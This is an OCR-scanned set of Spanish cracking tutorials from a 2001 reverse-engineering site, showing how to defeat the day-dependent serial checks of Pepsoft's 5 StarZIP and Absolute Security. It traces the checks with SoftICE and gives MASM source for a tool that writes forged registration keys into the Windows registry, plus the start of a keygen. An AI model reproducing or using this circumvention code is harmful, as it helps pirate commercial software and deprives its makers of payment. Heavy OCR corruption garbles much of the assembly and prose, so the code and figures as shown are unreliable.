patcher. Ahora si, dando solo enter, o ingresando cualquier cosa ya podemos 
jugar al SS vl.l. 


Bueno aquí se termina el tutorial. Reconozco que se hizo un poco extenso, pero 
valió la pena, ya que en un mismo tutorial no solo aprendimos un poco de 
parchear saltos, sino también de archivos empaquetados y a solucionar un gran 
bug que presenta el sistema operativo de Billy. Tres al precio de uno. 


Ahora si, un saludo grande a Karpoff, Dek_Oin, Black Fenix y PreFeSoR X, que son 


unas bestias del cracking y a todos los que aportan conocimientos a esta página. 
Todos para uno y uno para todos. Hasta la próxima. 


Saccopharynx. 
saccopharynxftyahoo.com 


Karpoff Spanish Tutor: 
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Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


sobre 


Karpoff Spanish Tutor 2001 


Programa: 5 StarZIP-2001 1.0 

PROTECCION: Un serial distinto para cada día.. 

Objetivo: Registrarnos el día que nos apetezca :-) 

Descripcion: Otro compresor/descompresor, y van... 

Dificultad: Aficionado 

DOWNLOAD: www.pepsoft.com 

Herramientas: Softice,MAsm32. 

CRACKER: CaoS ReptantE FECHA: 18/11/2001 
INTRODUCCION 


Seguramente habréis oído pronunciar la frase "vivir al día", pues el infausto programador de hoy 
también. Lo malo es que a él se le ocurrió la brillante idea de hacer que el serial para registrar este 
programa variara cada día. Yo al principio, creía que el serial cambiaba al efectuar una nueva 
instalación, pero si se busca el serial del programa instalado días antes, se desinstala, se instala de 
nuevo y se vuelve a buscar el serial, se puede ver que es el mismo. Sin embargo si se vuelve a 
buscar al día siguiente, el serial ha variado. Vivir para ver... 


AL ATAKE 


Encontrar el serial es sencillo, mediante el sistema que ya he descrito en otras ocasiones para pillar al programa 
cuando lee el serial chungo que hemos introducido (instrucción s O 1 ffffffff 'serial_chungo' ya 


continuación bpm o bpr de la dirección o direcciones obtenidas). Vamos a parar aquí: 


:004039C9 8BOE mov ecx, dword ptr [esi] 
1:004039CB 8B1F mov ebx, dword ptr [edi] 
|: 004039CD 39D9 cmp ecx, ebx 

1:004039CF 7558 jne 00403A29 

1:004039D1 4A dec edx 

:004039D2 7415 je 004039E9 


:004039D4 8B4E04 mov ecx, dword ptr [esi+04] 


:004039D7 8B5F0O4 mov ebx, dword ptr [edi+04] 


:004039DA 39D9 cmp ecx, ebx 
:004039DC 754B jne 00403A29 
:004039DE 83C608 add esi, 00000008 
:004039E1 83C708 add edi, 00000008 
:004039E4 4A dec edx 

:004039E5 75E2 jne 004039C9 
:004039E7 EBO6 jmp 004039EF 


El problema está en que el programa es teóricamente imparcheable - De eso ya hablaremos otro día ;-) - porque pasa 
un montón de veces por la comprobación comparando cadenas de texto, algunas de las cuales no tienen nada que ver 
con el serial y que unas veces son iguales y otras no. Así que de eso de invertir el salto... nada de nada :-( 


Podemos encontrar el serial hoy y registrar el programa, pero si dejamos el registro para mañana, deberemos repetir 
el proceso. Y por supuesto, nada de pasárselo a un colega para que pueda evaluar el programa sin prisas. ¿Qué 
¡podemos hacer? Se impone mirar el registro. Es una buena práctica la de utilizar el TechFacts en el momento de 
registrarse, así se puede ver al registrar el programa, los cambios que se han efectuado en el registro o en algún 
archivo extraño. En nuestro caso, veremos que se han añadido estas dos claves: 


HKEY_USERSN .DEFAULTASoftwarelPepsoft15StarZIP1RegYUserKey="RELCLZMEZVZKUEFF" 
HKEY_USERSN .DEFAULTASoftwarelPepsoft15StarZIPXRegYUserName="CAOS REPTANTE" 


Por cierto, si ponéis en el Softlce un bex RegCreateKeyExA, podréis ver como las claves que crea el programa 
son: 


HKEY_CURRENT_USERISoftwarelPepsoft15StarZlIP1RegYUserKey="REFLCLZMEZVZKUFF" 
HKEY_CURRENT_USERASoftwarelPepsoftX5StarZIPl1ReglYUserName="CAOS REPTANTE" 


Por lo visto, unas claves generan las otras, lo que no sé es por qué el TechFacts sólo detecta las dos que he 
mencionado en primer lugar. 

Por cierto, para ver esas claves hay que mirar los valores almacenados en la pila, mediante d esp, y a partir de esa 
dirección se van comprobando los valores guardados de cuatro en cuatro bytes (algunos de estos valores 
corresponden a números y otros, a las direcciones donde se hallan los datos que nos interesan). 

Si hacéis la prueba, veréis que el serial que aparece, siempre es el mismo independientemente del día en que 
estemos. Ahora ya tenemos donde agarrarnos :-) Así pues se trata de introducir esos datos en el registro y tendremos 
registrado el programa a nuestro nombre. En primer lugar hay que localizar el punto en el que el programa escribe 
este serial mediante la instrucción s O 1 ffffffff 'RELCLZMEZVZKUEF"' y a continuación bpm o bpr de 


las direcciones obtenidas. Así llegaremos haciendo marcha atrás, a este código: 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00496995 (C) 


:0049694E 33C0 xor eax, eax 
:00496950 8A03 mov al, byte ptr [ebx] 


EBX apunta a una cadena que está formada por OFh que es la longitud del serial (siempre comprendida entre un 
mínimo de 15 y la longitud del nombre que como máximo será de 23 caracteres), y "CAOS REPTANTECA" 


(nuestro nombre más las letras que falten hasta 15, a partir de la primera). 


:00496952 8B55F4 mov edx, dword ptr [ebp-0C] 
:00496955 OFB6543AFF movzx edx, byte ptr [edx+tedi-01] 


EBX apunta a una cadena que empieza por 00 y sigue con "5STARZIPv1.0358093027". Pero lo que yo no supe 


ver, es que las nueve últimas cifras no eran constantes. Afortunadamente ByTESCRK ha evitado que metiera la pata 
hasta lo más hondo. Se dió cuenta de que el programa que le había mandado para registrar el programa no 
funcionaba y detectó que se debía a que el programa obtenía los datos del disco duro para completar la generación 
del serial de registro. Justo aquí: 


:00496DF3 E808E5F6FF call 00405300 
:00405300 FF25E4524A00 jmp dword ptr [004A52E4] 


Esto se hace mediante GetVolumelnformationA que es una API que da información de un disco especificado. Los 
parámetros de esta función son ocho: 


19- "C:A" (el disco donde está instalado el programa) 

2%- Una dirección en la que la función escribe el nombre del disco. 
3*- 0104h (la longitud del nombre del disco) 

4%- Una dirección en la que la función escribe el número del disco. 
5%- Una dirección en la que hay la longitud máxima del nombre de 


archivo. 

6%- Una dirección en la que la función escribe el valor de los flags 
del 

sistema de archivos. 

7% Una dirección en la que la función escribe el nombre del sistema 
de 


archivos. 
8%- 0104h (la longitud del nombre del sistema de archivos) 


Esto aunque en inglés, está mejor explicado en la Win32 Programmer's Reference. 


Ahora que ya sabemos el verdadero origen de estos números, continuemos con el código. 


:0049695A 6603C2 add ax, dx 

:0049695D 668945FA mov word ptr [ebp-06], ax 
:00496961 OFBF45FA MOVSX €axX, word ptr [ebp-06] 
:00496965 B917000000 mov ecx, 00000017 

:0049696A 99 cdg 

:0049696B F7F9 idiv ecx 


Va sumando los códigos ASCII de los caracteres de las dos cadenas y los divide por 23 (17h) 


:0049696D B8F4694900 mov eax, 004969F4 


EAX apunta a la cadena "ABCDEFGHIKLMNPORTUVWXYZ". 


:00496972 8A1410 mov dl, byte ptr [eax+edx] 


Coloca en DL la letra que está en la posición determinada por el resto de la división. Ahora vemos por qué divide 
por 23: el resto será un número comprendido entre el O (A) y el 22 (Z). 


:00496975 8D85E8FCEFEEF lea eax, dword ptr [ebp+FEFEFFFCES] 
:0049697B 885001 mov byte ptr [eax+011], dl 


Guarda la letra en la memoria... 


:0049697E C60001 mov byte ptr [eax], 01 


:00496981 
:00496987 
:0049698D 


8D95E8FCFFFF lea 
8D85F4EFDFFEFF lea 


edx, dword ptr [ebp+FFFFFCE8S] 
eax, dword ptr [ebp+FEFFFFDF4] 


E88EC1F6FF call 00402B20 


En este call, va colocando las letras en su lugar. 


:00496992 47 inc edi 
:00496993 43 inc ebx 
:00496994 4E dec esi 
:00496995 75B7 jne 0049694E 


Vuelve al inicio del bucle. 


Ya sabemos lo necesario para hacer un programa que nos registre la aplicación :-) 


Echaremos mano del Masm y crearemos dos archivos: el de recursos rsrc. rc en el que definiremos la ventana y 


los botones, 


y el 5Star.asm en el que escribiremos el código del programa. 


El fichero de recursos podría ser este: 


finclude 


tdefine 


tdefine 


tdefine 


define 


define 


app ICON 


"Xmasm32lincludelresource.h" 


IDD_DIALOG 1000 


IDC_NOMBRE 1001 


IDC_REGIS 1002 


IDC_INFO 1003 


IDC_STATIC -1 


reg.ico 


IDD_DIALOG DIALOG 100,100,129,104 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "CaoS ReptantE" 

FONT 10, "MS Sans Serif" 

BEGIN 
GROUPBOX "Programa", IDC_STATIC,8,6,113,20 
LTEXT "5 StarZIP-2001 1.0",IDC_STATIC,12,14,97,8,ES_CENTER 
GROUPBOX "Website", IDC_STATIC,8,28,113,20 
LTEXT "www.pepsoft.com", IDC_STATIC,12,36,97,8,ES_CENTER 
GROUPBOX "Nombre", IDC_STATIC,8,50,113,27 


EDITTEXT IDC_NOMBRE, 22,60,85,11,ES_AUTOHSCROLL 


PUSHBUTTON "Registrar", IDC_REGIS, 8,84,48,14 
PUSHBUTTON "Información", IDC_INFO, 73,84,48,14 


END 


No parecen necesarias muchas explicaciones. Hemos definido la ventana y los controles que están situados en ella, 
también hemos incluido un archivo de recursos y el icono correspondiente. 


Ahora vamos a por el archivo de código :-) 


Me limito a explicar alguna de las características del código, ya que hay cosas que he comentado en algún otro tuto. 
Si queréis alguna aclaración, podéis darme un toque. 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32lincludeNwindows.inc 
include c:imasm32lincludeluser32.inc 

include c:imasm32lincludeladvapi32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm3211libluser32.lib 

includelib c:imasm3211libladvapi32.lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 
IDC_NOMBRE EQU 1001 
IDC_REGIS EQU 1002 
IDC_INFO EQU 1003 


D1gFunc PROTO :DWORD, :DWORD, :DWORD, : DWORD 
Operacion PROTO 


.data 

Icono db "app",0 

Iconimage db "app",0 

errorl db: MiErrort",.0 

error2 db "¡Mínimo siete caracteres!",0 

error3 db "¡Fallo en registro!",0 

exitol do "¡Exito!",0 

exito2 db "¡5 StarZIP ha sido registrado!",0 

txtl db "Una vez instalado el 5 StarZIP, es suficiente con pulsar el ",%M 


"botón ""Registrar"" para que el programa quede registrado con el nombre ",A 
"gue se haya introducido previamente.",13,10,13,10,%M 
"Es indiferente el directorio desde el que se ejecute este 
programa.",13,10,13,10,3 
"Saludos de CaoS ReptantE :0)",0 
txt2 db "Información",0 


cadena db 0,"5STARZIPv1.0",12 dup(0),0 


abc db "ABCDEFGHIJKLMNPORTUVWXYZ",0 
hInstance dd O 

hIcon dd 0 

hWnd dd 0 

clave db "SoftwarelPepsoft15StarZIPXReg",0 


subclavel db "UserName",0 
subclave2 db "UserKey",0 


valorl db 25 dup(0),0 
valor2 db 25 dup(0),0 
disco db 4 dup(0),0 
archivo db "5starzip.exe",0 
dff db 0,0 

varios db 255 dup(0),0 
numdisc db 4 dup(0),0 
handle dd ? 

dev dd ? 


De las variables que acabamos de definir, sólo comentaré las últimas: archivo es el nombre del ejecutable que 
emplearemos para saber en que disco está instalado el programa; varios es un campo en el que se pondrán 
sucesivamente algunos de los valores que devuelve las funciones GetFullPath... y GetVolume... , he puesto un solo 
campo y ahí se irán machacando; numdisc es donde se colocará el número del HD; handle es el valor del handle 
de la clave que hemos creado en la instrucción RegCreateKeyExA y que se utiliza a continuación en 
RegSetValueExA; dev es un valor que nos indica si la clave ha sido creada o si ya existía y sólo se ha abierto. En 
nuestro caso no lo utilizamos. 


.code 
start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG,NULL,ADDR DlgFunc, NULL 
invoke ExitProcess,NULL 


Dl1lgFunc proc hD1g:DWORD, uMsg: DWORD, wParam:DWORD, 1lParam:DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWind, eax 
invoke LoadIcon,hInstance,ADDR Icono 
mov hIcon,eax 
invoke SendMessage, hD1lg, WM_SETICON, 1,hIcon 


Muestra la ventana con el icono que hemos definido. 


.€lseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


Si cerramos la ventana desde la esquina superior derecha, adiós. 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx, eax 


shr edx,16 


Si hemos pulsado un botón, el programa busca cual ha sido. 


.1f dx==BN_CLICKED 
.1f ax==IDC_INFO 
invoke MessageBox,hDl1g,ADDR txt1,ADDR txt2,MB_ICONINFORMATION 


Si hemos pulsado el de "Información", nos muestra la ventana con el mensaje que hemos definido y el icono 
correspondiente. 


.elseif ax==IDC_REGIS 

invoke GetD1gItemText,hDl1g,IDC_NOMBRE,ADDR valorl,24 

invoke Operacion 

.1f eax==717 

invoke MessageBox,hDl1g,ADDR error2,ADDR errorl,MB_ICONSTOP 

.elseif eax==ERROR_SUCCESS 

invoke MessageBox,hDl1g,ADDR exitol,ADDR 

exito2,MB_ICONEXCLAMATION 

invoke EndDialog,hDl1g,NULL 

.else 
invoke MessageBox,hDl1g,ADDR error1,ADDR error2,MB_ICONSTOP 
invoke EndDialog,hD1g,NULL 

.endif 

ret 


Y si hemos pulsado el de "Registrar", vamos a la subrutina Operacion y al regreso, nos muestra un mensaje de 


éxito o de fracaso. Si el fracaso es debido a que el nombre que hemos introducido tiene menos de siete letras, nos 
deja seguir intentándolo, en los otros casos, cierra el programa. 


.endif 
.endif 
.endif 
ret 


Dl1lgFunc endp 


Operacion proc 
pushad 


Para saber el número de serie del disco en que está instalado el programa, primero hemos de averiguar que disco es. 
Eso lo hacemos con esta función: 


invoke GetFullPathNameA,Offset archivo,255,Offset varios, Offset 
varios+4 


Le damos el nombre del programa "víctima" y el número de caracteres que creemos que puede ocupar, nos devuelve 
el path completo en el campo varios y en varios +4, la dirección del nombre del ejecutable. Se machacarán 


parte de los datos pero sólo nos interesan los tres primeros caracteres) 


mov ebp, Offset varios 
mov ecx, Offset disco 
mov eax, dword ptr [ebpl 
and eax, O0ffffffh 


mov [ecx], eax 


Ya tenemos puesta la letra de nuestro disco en el campo disco. La instrucción anterior sirve para poner el último 
carácter de los cuatro que hemos tomado, a cero. 


xor esi, esi 

mov ebx, Offset cadena 

add ebx, 13 

invoke GetVolumeInformationA, Offset disco,Offset 
varios,0104h,Offset numdisc, Offset dff,Offset varios, Offset varios,0104h 
mov eax, Offset numdisc 

mov eax, dword ptr [eax] 


Tenemos el número del disco duro en EAX, ahora lo pasaremos a decimal. 


mov ecx, 10 


otro: 
cmp eax, ecx 
jb yaesta 
xor edx, edx 
idiv ecx 
add dl, 48 
mov byte ptr [ebpl, dl 
inc ebp 
inc esi 
jmp otro 
yaesta: 
add al, 48 
inc esi 


mov byte ptr [ebpl, al 


Tenemos el número pasado a decimal y colocado en el campo varios al que como veis, le sacamos mucho 
partido :-) Lo hemos puesto tal como se iba generando, es decir: en orden inverso. A continuación lo iremos pasando 
a su lugar definitivo, detrás de la parte conocida del campo cadena, también en orden inverso para que quede 


ordenado correctamente. 


mas: 
mov al, byte ptr [ebpl] 
mov byte ptr [ebx1l, al 
inc ebx 
dec ebp 
dec esi 
.1f esi> 0 

Jjmp mas 
.endif 


Ya esta hecho. Ahora después de esta fase previa vamos al lio. 


xor eax, eax 
xXOr ecx, ecx 

xor ebp, ebp 

mov edx, Offset valor2 
mov edi, Offset cadena 
mov esi, Offset abc 


mov ebx, Offset valorl 
invoke l1lstrlen, offset valorl 
.1f eax < 7 
popad 
mov eax, 7177 
ret 
.endif 
xor eax, eax 


Obtenemos la longitud del nombre introducido ya que he observado que, si tiene menos de siete letras, el programa 
no se registra. En este caso, le damos un valor arbitrario a EAX y volvemos a la rama principal del programa. En 
algún sitio debe haber un control de la longitud del nombre, aunque no lo he visto y tampoco he buscado demasiado. 


buclel: 
mov cl, byte ptr [ebx+teax] 
.1f ecx==0 

Jjmp seguir 
.endif 
.1f ecx>96 

.1f ecx<123 

sub ecx, 32 

.endif 
.endif 
mov [ebx+eax], cl 
inc eax 
jmp buclel 


Este bucle toma las letras una a una, si son minúsculas las convierte en mayúsculas y las vuelve a poner donde 
estaban. Si el carácter no es una letra, lo deja como estaba. 


seguir: 

.1f eax<15 
mov eax, 15 

.endif 

push eax 

mov [edx], al 

pop eax 

dec eax 

push ebx 

inc edx 


La primera letra del serial viene dada por la longitud del nombre, si esta es menor de 15, se iguala a esta cifra y se 
coloca al inicio del campo valor2 donde se formará el serial. Esta cifra se debería dividir por 23, pero he tenido 
problemas con los seriales de 24 o 25 letras (como podéis ver, el programa no deja entrar más) y más arriba, en 


invoke GetDlgltemText... he limitado la entrada a 23 letras. 
bucle2: 
mov cl, byte ptr [ebx] 
if ecx== 
mov ebx, Offset valorl 
jmp bucle2 
.endif 
mov [edx+ebp], cl 
dec eax 


inc ebx 


inc ebp 
.1f eax== 

xor ebp, ebp 
dec edx 

pop ebx 

jmp bucle3 
.endif 
jmp bucle2 


Se pasan las letras del nombre al campo valor2 donde se formará el serial. Si el nombre tiene menos de 15 letras 
se continúan poniendo letras a partir de la primera hasta llegar a las quince. 


bucle3: 
mov al, byte ptr [edx+ebpl]l 
and eax, 000000FEFh 
.1f eax== 
jmp reg 
.endif 
mov cl, byte ptr [edi+ebp] 
add eax, ecx 
push edx 
xor edx, edx 
mov ecx, 23 
idiv ecx 
mov cl, byte ptr [esit+edx] 
pop edx 
mov [edx+ebp], cl 
inc ebp 
inc ebx 
jmp bucle3 


Ponemos en AL el código ASCII de cada letra, ponemos a cero el resto del registro EAX y le sumamos el código del 
carácter correspondiente del campo cadena, dividimos la suma por 23 y tomamos la letra del campo abc 
indicada por el resto (desde la "A" que corresponde al 0, a la "Z" que corresponde al 22). ¿Os habéis preguntado por 
qué 23 letras? ¿Y por qué faltan precisamente la "I", la "O" y la "S"? Pues hay una razón para ello. Pensad a ver si se 
os ocurre :-) Bien, sigamos. Se repite el proceso hasta que se acaban las letras. Insisto en que sí algo no está claro, 
me deis un toque. Ya tenemos el serial que hemos de colocar en el registro de Windows. Vamos a ello... 


reg: 

popad 

invoke RegCreateKeyExA, 80000001h,ADDR 
clave, NULL, NULL, NULL, 0FO0O3Fh,NULL, ADDR 
handle,ADDR dev 

.1f eax!=ERROR_SUCCESS 


push eax 
jmp fin 
.endif 


El valor 8000001 corresponde a HKKEY_CURRENT_USER, y el FOO3E, al nivel de seguridad de acceso (hemos 
puesto el mismo que pone el 5Star Zip). Los demás valores ya están vistos, y la instrucción push eax es porque en 


caso de error, como la última instrucción de la subrutina es RegCloseKey, que no nos dará error, esto cambiaría el 
valor de EAX y enmascararía el resultado. 


invoke RegSetValueExA, handle, ADDR subclavel, NULL, REG_SZ,ADDR valorl1,25 
.1f eax!=ERROR_SUCCESS 


push eax 
jmp fin 
.endif 
invoke RegSetValueExA, handle, ADDR subclave2,NULL,REG_SZ,ADDR valor2,25 
.1f eax!=ERROR_SUCCESS 
push eax 
jmp fin 
.endif 
push eax 


Colocamos los valores correspondientes y si todo ha ido bien, la instrucción push eax que hay al final guarda el 
valor de EAX para recuperarlo a continuación (Si no la pusiéramos, la instrucción pop eax que hemos puesto para 
recuperar el valor de EAX en caso de error, machacaría EAX y nos daría un resultado imprevisible). 


fin: invoke RegCloseKey, HKEY_USERS 


pop eax 
ret 


Cerramos el registro abierto y volvemos a la rama principal del programa. 


Operacion endp 
end start 


Supongo que alguien que entienda de programación en assembler podrá opinar que este código es una chapuza, pero 
tiene algo de bueno: funciona ;-) Ahora sólo queda compilar los dos archivos y ya podemos registrar el programa. 


Yo sólo quería hacer un tutorial sencillo que mostrara como hacer un pequeño programa que se encargara de 
introducir datos en el registro sin tener que utilizar un archivo . reg, pero las cosas se han complicado de mala 
manera. Hubiera sido preferible hacer un keygen, el algoritmo es mucho más sencillo. Quizá lo haga de otro 
programa de la misma empresa :-) 


Como siempre, quiero recordaros que debéis pagar por los programas que utilicéis regularmente, ya que de lo 
contrario, podéis acabar en la lista de los más buscados, junto con los tíos de los turbantes y las barbas :-) 


Para terminar, quiero saludar a mis amigos DeK_Oin - esta vez te he puesto el primero ;-) -, Act MagO, y PrfEsOr 
'X. También a Karpoff, KuaTo_ThoR, vLugo y especialmente a Silver Storm, ya que un comentario suyo me dio la 


idea de hacer este tuto y por supuesto a ByTESCRK agradeciéndole su inestimable colaboración. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


PELOGRAnmAS Absolute Security 3.9 

PROTECCION: Un serial distinto para cada día. 

Objetivo: Hacer un Keygen. 

Descripcion: Utilidad para encriptar archivos. 

Dificultad: Aficionado 

DOWNLOAD : http://www .pepsoft.com/absecpro.zip 

Herramientas: Softice,MAsm32. 

CRACKER: CaoS ReptantE FECHA: 18/11/2001 
INTRODUCCION 


Este tutorial sigue al de 5 StarWinzip. En ese programa me encontré con que el serial 
correcto cambiaba de un día para otro y resolví el tema de una manera muy complicada, 
actuando sobre el registro (se trata de aprender ¿no?). Aquí vamos a operar sobre otro 
programa de la misma empresa con una protección casi idéntica y buscaremos la manera de 
hacer un keygen. El interés que pueda tener este tutorial está en el uso de la función 
GetLocalTime y por supuesto en remarcar el hecho de que con obtener un serial para 
registrarnos, es posible que no hayamos terminado nuestro trabajo. 


AL ATAKE 


Procederemos como en otras ocasiones. Con el Softlce cargado, llegamos a la ventana de registro, ponemos 
unos datos chungos, antes de aceptar entramos en el Slce y colocamos nuestro bpx favorito (amemcpy), 


salimos del Slce y pulsamos OK. Salta el SIce porque el programa ha leído el nombre, le damos a FS para que 
lea la clave y después le damos a F12 siete veces para llegar al programa. Aparecemos aquí: 


:0042C1DD 5E pop esi 


Ahora es cuestión de ver cuando el programa lee nuestro nombre para ver que hace con él (instrucción s 0 
1 Ff£ffffff 'nombre' y a continuación bpm o bpr de la dirección o direcciones obtenidas). Ahora 


empieza un largo peregrinaje para llegar a la rutina de generación del serial. Durante este largo camino 
veremos como el nombre va pasando de un sitio a otro, lo que nos obligará a poner más instrucciones bpr 


(como sólo podemos utilizar cuatro instrucciones bpm, ya se nos han acabado). También es conveniente 
repetir la búsqueda con la instrucción s. . . por si alguno de estos movimientos nos ha pasado desapercibido. 
Llegamos a un punto interesante: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00406310(C) 


:004062FD 8A02 mov al, byte ptr [edx] 
:004062FF 3C61 cmp al, 61 

:00406301 7206 jb 00406309 

:00406303 3C7A cmp al, 7A 

:00406305 7702 ja 00406309 

:00406307 2C20 sub al, 20 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :00406301(C), :00406305(C) 


:00406309 8806 mov byte ptr [esil, al 
:0040630B 42 inc edx 

:0040630C 46 inc esi 

:0040630D 4B dec ebx 

:0040630E 85DB test ebx, ebx 
:00406310 75EB jne 004062FD 


Como podéis ver, pasa todas las minúsculas a mayúsculas. Los números y otros caracteres, entre ellos la ñ, la 
€ y las letras acentuadas, quedan como estaban. Tened en cuenta que ahora hay que buscar nuestro nombre 
con mayúsculas. Tras otro buen rato de tracear llegamos a: 


:0040393D 8BOE mov ecx, dword ptr [esi] 
:0040393F 8B1F mov ebx, dword ptr [edi] 
:00403941 39D9 cmp ecx, ebx 
:00403943 7558 jne 0040399D 


Aquí el programa compara el nombre con mayúsculas con el nombre tal como lo hemos entrado. Este mismo 
código se utiliza para varias comparaciones, entre ellas la del serial chungo con el correcto. Esto hace que el 
parcheado del programa sea algo problemático :-( Continuamos, y llegamos por fin a la madre del cordero: 


:0048C70C OFB63E movzx edi, byte ptr [esi] 


Pone en EDI la dirección del texto: "CAOS REPTANTECA"”. Si el nombre introducido tuviera quince o más 


caracteres, aparecería completo. Como en este caso no es así, aparecen los trece caracteres del nombre 
introducido, más los dos primeros, que hacen una longitud total de quince caracteres. 


:0048C70F 8B45F8 mov eax, dword ptr [ebp-08] 
:0048C712 0FB64418FF mOvzxX eax, byte ptr [eax+ebx-01] 


Coloca en EAX la dirección de: "ZZMd5elXW6 ImPgRr”. 


:0048C717 6603F8 add di, ax 

:0048C71A B8E4C74800 mov eax, 0048C7E4 

:0048C71F” 0FB64418FF mOvVzxX eax, byte ptr [eax+ebx-01] 
:0048C724 6603F8 add di, ax 


El programa suma los códigos ASCII del primer carácter de los textos anteriores. A continuación coloca en 
EAX la dirección del texto: "110101v3. 9ABSECPRO" (las seis cifras que están al principio corresponden 


al día de la fecha en formato mmddaa), y suma el código de su primer carácter a la suma anterior. 


:0048C727 33C0 xor eax, eax 
:0048C729 8A85FBFBFEFFF mov al, byte ptr [ebp+FFFEFBFB] 
:0048C72F 6603F8 add di, ax 


Pone en AL el código ASCII de la cifra de las decenas correspondientes al día de la fecha y lo suma. 


:0048C732 33C0 xor eax, eax 
:0048C734 8A85FCFBFFFF mov al, byte ptr [ebp+FFFEFFBEC] 
:0048C73A 6603F8 add di, ax 


Pone en AL el código ASCII de la cifra de las unidades correspondientes al día de la fecha y lo suma. 


:0048C73D OFBEC7 movsx eax, di 
:0048C740 B917000000 mov ecx, 00000017 
:0048C745 99 cda 

:0048C746 FT7F9 idiv ecx 


Finalmente coloca la suma total en EAX y la divide por 23 (17h) 


:0048C748 B8FCC74800 mov eax, 0048C7FC 
EAX señala al texto: "ABCDEFGHIKLMNPORTUVWXYZ". 
:0048C74D 8A1410 mov dl, byte ptr [eaxtedx] 


Ya tenemos en DL la primera letra del serial. Corresponde al resto de la división (en EDX) y puede ser desde 
la "A" (0) hasta la "Z" (22). 


Sigue el código pero ya sabemos lo que nos interesa sobre la generación del serial. Este bucle se repite quince 
veces, hasta completar el serial con las letras que forman los textos que hemos visto. Lo único que no varía 


son las cifras del día de la fecha, que siempre son las mismas: O y 1 (os recuerdo que estamos a 1 de 
noviembre). En resumen: 


(Cc) (A) (0) (5) (A) 
43 41 4F 53 pe 41 
(1) (1) (0) (1) (Cc) 
31 Sil 30 31 a 43 
(2) (2) (M) (d) (R) 


5A 5A 4D 64 e 52 


30 30 30 30 da 30 


+ 31 31 31 31 31 

12F 12D 12D 149 da 137 

:17h D D D E Hb D 
resto: 4 2 2 7 a € 
letra: E E Cc H 25 N 


Bueno, pues ya está. Ahora vamos a por el Msam y nos montaremos dos archivos: el de recursos rsrc.rc 
en el que definiremos la ventana del keygen y los elementos que van en ella, y el de código Absolute.asm 
en el que estarán las instrucciones de nuestro programa. Os recomiendo los tutoriales: Como Craquear con 
Ensamblador para Win32 de Mr. Crimson (los podéis encontrar en la Compilación de Tutoriales 2000 4.0 del 
PrfEsOr X). Espero que os sean tan útiles como a mí ;-) 


tfinclude "Amasm32lincludelresource.h" 


define IDD_DIALOG 1000 
define IDC_NOMBRE 1001 
Hdefine IDC_SERIAL 1002 
Hdefine IDC_GEN 1003 
fdefine IDC_INFO 1004 
Hdefine IDC_EXIT 1005 
Hdefine IDC_STATIC -1 


app ICON key.ico 

IDD_DIALOG DIALOG 100,100,147,121 

STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 
CAPTION "Caos ReptantE" 


FONT 10, "MS Sans Serif" 


BEGIN 
GROUPBOX "Programa", IDC_STATIC,8,6,131,20 
LTEXT "Absolute Security PRO 
3.9", IDC_STATIC,12,14,115,8,ES_CENTER 
GROUPBOX "Website", IDC_STATIC,8,28,131,20 
LTEXT "www.pepsoft.com", IDC_STATIC,12,36,115,8,ES_CENTER 
GROUPBOX "Registro", IDC_STATIC,8,50,131,44 
LTEXT "Nombre", IDC_STATIC,18,61,25,8 
EDITTEXT IDC_NOMBRE, 45, 60,80,11,ES_AUTOHSCROLL | ES_CENTER 
LTEXT "Serial", IDC_STATIC,18,78,25,8 
EDITTEXT IDC_SERIAL, 45,77,80,11,ES_CENTER | ES_READONLY 
PUSHBUTTON "Generar", IDC_GEN,8,101,37,14 


PUSHBUTTON "Info", IDC_INFO,55,101,37,14 


PUSHBUTTON 


END 


Lo dicho, ahí está la ventana y los elementos que hay en ella, con sus dimensiones y características. No 
parecen necesarias más explicaciones. Ahora vamos a por el archivo de código. 


.386 


.model flat,stdcall 


option casemap:none 


include 


include 


"Salir", IDC_EXIT,102,101,37,14 


c:imasm32lincludewindows.inc 
include c:imasm32lincludeluser32.inc 
c:imasm32Xincludeladvapi32.inc 


include c:imasm32lincludelkernel32.inc 


includelib c:imasm321libluser32.1lib 


includelib c:imasm3211libladvapi32.lib 
includelib c:imasm3211iblkernel32.lib 


.const 


IDD_DIALOG 
IDC_NOMBRE 
IDC_SERIAL 
IDC_GEN 
IDC_INFO 
IDC_EXIT 


D1gFunc PROTO 


El procedimiento principal y las dos subrutinas que vamos a utilizar. 


.data 


Icono 
Iconimage 
errorl 
error2 
txt1 


txt2 
nomorig 
nombre 
serial 
campo 
fecha 
dia 
cadenal 


db 
db 
db 
db 
db 


db 
db 
db 
db 
db 
db 
db 
db 


EQU 
EQU 
EQU 
EQU 
EQU 
EQU 


1000 
1001 
1002 
1003 
1004 
1005 


: DWORD, : DWORD, :DWORD, : DWORD 
Operacion PROTO 
Subrutina PROTO 


" app " Ñ 0 
" app " A 0 
"¡Error!",0 


"¡Mínimo cinco caracteres!",0 


"El serial que proporciona este programa sólo es válido ", 


"para el día de hoy.",13,10,51 


"¡Date prisa! 


¡Antes de que den las 12!",13,10,13,10,1 


"Saludos de CaoS ReptantE :0)",0 
"Información",0 


"CaoS ReptantE",12 dup 


25 dup (0),0 
15 dup (0),0 


16 dup (0),0 
8 dup (0),0 
0,0,0 


"ZZ2Md5belXW69mMPGRrR",0 


(0),0 


N 


cadena2 db 6 dup (0),"v3.9ABSEC",0O 


abc db "ABCDEFGHIKLMNPORTUVWXYZ",0 
hInstance dd 0 
hIcon da 0 
hWnd da 0 


